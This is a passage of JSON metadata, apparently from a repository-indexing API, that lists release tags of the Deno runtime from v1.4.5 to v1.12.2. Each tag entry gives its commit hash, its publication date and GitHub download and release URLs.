618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/d